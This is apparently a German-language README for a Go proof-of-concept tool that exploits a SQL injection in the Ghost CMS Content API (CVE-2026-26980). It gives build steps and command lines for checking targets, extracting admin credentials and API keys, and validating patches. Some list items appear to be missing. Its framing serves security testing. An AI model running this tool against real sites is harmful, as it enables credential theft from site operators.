
Go-basierter PoC für Ghost CMS Content API SQL-Injection (CVE-2026-26980). Überprüft die Schwachstelle, extrahiert Admin-Anmeldeinformationen und API-Geheimnisse und validiert Patches für die betroffenen Versionen 3.24.0–6.19.0.
Dieses Repository enthält ein Go-basiertes Proof-of-Concept-Tool zur Demonstration und Validierung der Ghost CMS Content API SQL-Injection-Schwachstelle, beschrieben durch CVE-2026-26980. Die Implementierung basiert auf dem Exploit-Ablauf in der Haupt-Go-Quellcodedatei und ist nur für autorisierte Sicherheitsforschung und Tests vorgesehen.
Der PoC zielt auf Ghost CMS-Instanzen ab, die von einer Content-API-Slug-Filter-Reihenfolge-Schwachstelle betroffen sind. Er kann:
Die Implementierung bezieht sich speziell auf den folgenden Beratungskontext:
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
Führen Sie im Projektstammverzeichnis Folgendes aus, um die Binärdatei zu erstellen:
go build -o ghost-sqli ghost_sqli_cms.go
ODER
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
Dieses Projekt wird nur zu Bildungs- und autorisierten Sicherheitsbewertungszwecken bereitgestellt. Verwenden Sie es nur gegen Systeme, die Sie besitzen, zu deren Test Sie autorisiert sind, oder die Sie in einer kontrollierten Umgebung evaluieren. Unautorisierter Zugriff oder Ausnutzung von Drittsystemen ist illegal und kann gegen geltende Gesetze verstoßen.